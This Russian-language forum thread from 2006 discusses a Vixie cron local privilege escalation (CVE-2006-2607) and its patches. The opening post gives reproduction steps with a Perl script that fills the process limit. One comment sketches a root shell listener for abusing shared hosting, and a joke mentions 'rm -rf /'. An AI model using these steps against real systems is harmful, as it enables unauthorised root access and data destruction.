Vixie Cron local root

0

0

В /etc/security/limits.conf добавляем "username hard nproc 10"
Раскомментируем строку с pam_limits.so в файле /etc/pam.d/crond
Добавляем в crontab задание: * * * * * /path/to/script.pl
где script.pl:

#!/usr/bin/perl
open file, '>/path/to/pid.'.$$;
close file;
while(1) { sleep(1); }

Через "ps aux" ждем когда запустится 10 экземпляров script.pl, следующие - будут видны как запущенные от root.

>>> Подробности

Ссылка

←	Fun With Kernel Names

Различные бизнес модели Open Source

→

у меня есть вариант проще

вместо редактирования /etc/security/limits.conf и /etc/pam.d/crond

набираем rm -rf / и вуаля! мы похакали свой комп

geek ★★★
(29.05.06 13:09:09 MSD)

PAM - ЗЛО

robot12 ★★★★★
(29.05.06 13:15:48 MSD)

Ответ на: комментарий от geek 29.05.06 13:09:09 MSD

Ага, vixie-cron не проверяет возврат вызова собственного setuid и поэтому процесс оставался под рутом

"do_command.c in Vixie cron (vixie-cron) 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails" - это ж просто дупло какое то.

~~Sun-ch~~ ☆
(29.05.06 13:16:15 MSD) автор топика

Ответ на: комментарий от robot12 29.05.06 13:15:48 MSD

альтернативы есть?

SteepZ ★
(29.05.06 13:19:19 MSD)

Ссылка

Ответ на: комментарий от Sun-ch 29.05.06 13:16:15 MSD

Аааааааа у мя в ссистеме dcron установлен ...

robot12 ★★★★★
(29.05.06 13:20:44 MSD)

Ответ на: комментарий от robot12 29.05.06 13:20:44 MSD

dcron не умеет cron.deny/cron.allow ну в общем нельзя например каким-то юзерам запретить пользоваться кроном. :( И это очень нехорошо.

anonymous
(29.05.06 13:24:10 MSD)

да это просто праздник какой-то =)

пошёл хакать всё подряд ^_^

blind ★
(29.05.06 13:27:53 MSD)

Ссылка

Ответ на: комментарий от anonymous 29.05.06 13:24:10 MSD

>нельзя например каким-то юзерам запретить пользоваться кроном.

Хммм а зачем запрещать пользоваться кроном ? :) глупый конечно вопрос но всё же ..

robot12 ★★★★★
(29.05.06 13:29:34 MSD)

/me юзает fcron :P
как-то оно приятнее мне показалось и функциональнее :\

newlogin
(29.05.06 13:31:44 MSD)

Ответ на: комментарий от robot12 29.05.06 13:29:34 MSD

К сожалению вопрос действительно глупый. :)

anonymous
(29.05.06 13:32:02 MSD)

Ссылка

Ответ на: комментарий от robot12 29.05.06 13:29:34 MSD

>Хммм а зачем запрещать пользоваться кроном ? :) глупый конечно вопрос но всё же ..

это для хостеров, у которых фича "crontab" платная ;)))

AcidumIrae ★★★★★
(29.05.06 13:37:49 MSD)

Ответ на: комментарий от newlogin 29.05.06 13:31:44 MSD

# rpm -qa | grep cron fcron-2.9.6-12tr crontabs-1.9-4tr

:-)

Valmont ★★★
(29.05.06 13:46:31 MSD)

Ответ на: комментарий от Valmont 29.05.06 13:46:31 MSD

Кстати, в оригинале ( opennet -> redhat(fedora) bugzilla ) Оное датировано январем кажется, также redhat'овсцы и выпустили заплатку. Хотя проблема там на стыке пама и крона, они патчили крон.

Valmont ★★★
(29.05.06 13:48:31 MSD)

Ответ на: комментарий от AcidumIrae 29.05.06 13:37:49 MSD

У меня везде на серверах доступ к crontab -e имеет только root. И все скрипты имеют права на изменения только root'ом. Поэтому уязвимость на самом деле не такая уж страшная...

SteelKey ★
(29.05.06 13:48:44 MSD)

Ответ на: комментарий от Valmont 29.05.06 13:48:31 MSD

s/'также'/'тогда же'/

Valmont ★★★
(29.05.06 13:49:29 MSD)

Ссылка

Ответ на: комментарий от anonymous 29.05.06 13:24:10 MSD

> в общем нельзя например каким-то юзерам запретить пользоваться кроном

а что мешает сделать мини-скрипт lockusercron:

#!/bin/sh

rm -f /var/spool/cron/crontabs/$1

touch /var/spool/cron/crontabs/$1

chattr +i /var/spool/cron/crontabs/$1

Похожим образом делаем unlock :-)

saper ★★★★★
(29.05.06 13:49:34 MSD)

Ответ на: комментарий от Valmont 29.05.06 13:46:31 MSD

root@pi3:/News/fcron-3.0.0# /News/fcron-3.0.0/convert-fcrontab `perl -e 'print "pi3"x600'` 15:28:13 Converting pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi 3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3pi3 (truncated) *** glibc detected *** malloc(): memory corruption: 0x0804f370 *** Przerwane (core dumped)

Btw. convert-frontab have suid bit and user/group root by default in trustix Linux.

anonymous
(29.05.06 13:50:17 MSD)

Ответ на: комментарий от saper 29.05.06 13:49:34 MSD

>> в общем нельзя например каким-то юзерам запретить пользоваться кроном

>а что мешает сделать мини-скрипт lockusercron:

>#!/bin/sh

>rm -f /var/spool/cron/crontabs/$1

>touch /var/spool/cron/crontabs/$1

>chattr +i /var/spool/cron/crontabs/$1

>Похожим образом делаем unlock :-)

Само собой. :) Вариантов много можно придумать. Но все же, это костыли. Очень хотелось бы иметь стандартную функциональность. :) А так конечно вопросов никаких. :)

anonymous
(29.05.06 13:54:28 MSD)

Ссылка

Ответ на: комментарий от anonymous 29.05.06 13:50:17 MSD

Крон по-моему тоже имеет suid-bit.

(Во фре.)
#ll /usr/bin/crontab
-r-sr-xr-x  1 root  wheel  26968 28 дек  2004 /usr/bin/crontab


А вот оное гуево конечно. Есть какие-либо воркэраунды на эту тему?

Valmont ★★★
(29.05.06 13:56:43 MSD)

Ответ на: комментарий от Valmont 29.05.06 13:56:43 MSD

Ага.

02/06/2006 fcron 3.0.1 is out ! A new version with several bug fixes, especially for BSD systems. The man pages have also been translated to French. Please note that a buffer overflow has been found in the program convert-fcrontab which is part of fcron 3.0.0: it seems that this bug is not exploitable, but it is safer to upgrade to fcron 3.0.1 which includes a fix for this bug as soon as possible.

Valmont ★★★
(29.05.06 13:59:30 MSD)

Ссылка

Ответ на: комментарий от SteelKey 29.05.06 13:48:44 MSD

> У меня везде на серверах доступ к crontab -e имеет только root. И все скрипты имеют права на изменения только root'ом. Поэтому уязвимость на самом деле не такая уж страшная...

Это не уязвимость, это фича :)))

~~aspell~~ ☆
(29.05.06 14:58:13 MSD)

Ссылка

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=178431

vixie-cron-4.1-40.FC4 has been pushed for FC4, which should resolve this issue

Тем кто пользуется федорой, можно не нервничать :-)

~~no-dashi~~ ★★★★★
(29.05.06 15:07:08 MSD)

Ответ на: комментарий от no-dashi 29.05.06 15:07:08 MSD

А баянистам типа Sun-ch'а я бы советовал смотреть на даты анонсов - этот баг анонсирован в январе.

~~no-dashi~~ ★★★★★
(29.05.06 15:09:58 MSD)

Ответ на: комментарий от no-dashi 29.05.06 15:09:58 MSD

Bugtraq ID: 18108
Class: Design Error
CVE: CVE-2006-2607
Remote: No
Local: Yes
Published: May 25 2006 12:00AM
Updated: May 26 2006 04:43PM
Credit: Discovery is credited to Roman Veretelnikov.
Vulnerable: RedHat Fedora Core4
Paul Vixie Vixie Cron 4.1
+ RedHat Fedora Core3

Очки купи, ога.

~~Sun-ch~~ ☆
(29.05.06 15:15:18 MSD) автор топика

Ответ на: комментарий от Sun-ch 29.05.06 15:15:18 MSD

Sun-ch, заколебал блин!!!

http://ftp.sunet.se/pub/os/Linux/distributions/fedora/updates/4/SRPMS/vixie-c... 02-Feb-2006 17:59 113K

Дыры нет уже более 4 месяцев как. Может еще начнешь про баги в RH5.0 "новости" постить?

~~no-dashi~~ ★★★★★
(29.05.06 15:25:48 MSD)

Ответ на: комментарий от no-dashi 29.05.06 15:25:48 MSD

Вру, не "более четырех месяцев", а "почти четыре месяца". На три дня ошибся

~~no-dashi~~ ★★★★★
(29.05.06 15:26:59 MSD)

Ответ на: комментарий от no-dashi 29.05.06 15:26:59 MSD

Мдя. Вы б по топику хотя бы глазами пробежали чтоль :-)

Valmont ★★★
(29.05.06 15:34:35 MSD)

Ответ на: комментарий от Valmont 29.05.06 15:34:35 MSD

Зачем ? Лучше саныча лишний раз пнуть - на лоре это святое дело :D :D

vtVitus ★★★★★
(29.05.06 16:21:57 MSD)

Ссылка

Ответ на: комментарий от Sun-ch 29.05.06 15:15:18 MSD

>Vulnerable: RedHat Fedora Core4
>            Paul Vixie Vixie Cron 4.1
>               + RedHat Fedora Core3


А чего не написал в новости, что проблемы только у Федоры, 
чтобы "все боялись"?

~~sdio~~ ★★★★★
(29.05.06 16:56:05 MSD)

Ответ на: комментарий от sdio 29.05.06 16:56:05 MSD

Тогда вместо пинания Sun-Ch'a будет холивор на тему дистров. ;)

LamerOk ★★★★★
(29.05.06 17:29:40 MSD)

Ссылка

> В /etc/security/limits.conf добавляем "username hard nproc 10"

Если при этом предварительно надо портить файлы в /etc/*, то в чём прикол?

eugrus ★★★★★
(29.05.06 18:39:38 MSD)

Ответ на: комментарий от eugrus 29.05.06 18:39:38 MSD

Прикол в том, что работает не корректно, не так, как должно.

For example, многие хостеры дают рестриктед шелл (в том числе и по ресурсам), более того дают еще еще и доступ к крону. Как раз получается обсуждаемый случай.

Впрочем сам я не пробовал проверить оную штуку, по идее, оно должно "работать" на связке pam+v.cron и на других дистрах.

Valmont ★★★
(29.05.06 19:36:01 MSD)

Ссылка

Ответ на: комментарий от eugrus 29.05.06 18:39:38 MSD

> Если при этом предварительно надо портить файлы в /etc/*, то в чём прикол?

портить файлы надо для быстрой демонстрации. а в продакшене стоит допустим hard nproc 512, и мне ничего не помешает наплодить 511 процессов, с расчетом чтобы следующий кронтаск запустился от рута - и повесил скажем шелл (рутовый, heh :) на порту 49181.

если у меня вообще нет шелла, а есть только web-panel управляемый крон - тоже не беда, ставим в крон два таска: форкалку и то что запустится от рута. на всякий случай проверяем: if (euid) exit else startlistener;

и 3.14здец шаред хостингу %))))))

dk2
(29.05.06 22:02:37 MSD)

Ответ на: комментарий от dk2 29.05.06 22:02:37 MSD

точнее даже так:

if (!euid) startlistener; else while(1) fork(); sleep(5);

и эту байду ставим запускаться раз в минуту :)

dk2
(29.05.06 22:11:47 MSD)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	Fun With Kernel Names

Безопасность

Различные бизнес модели Open Source

→

Похожие темы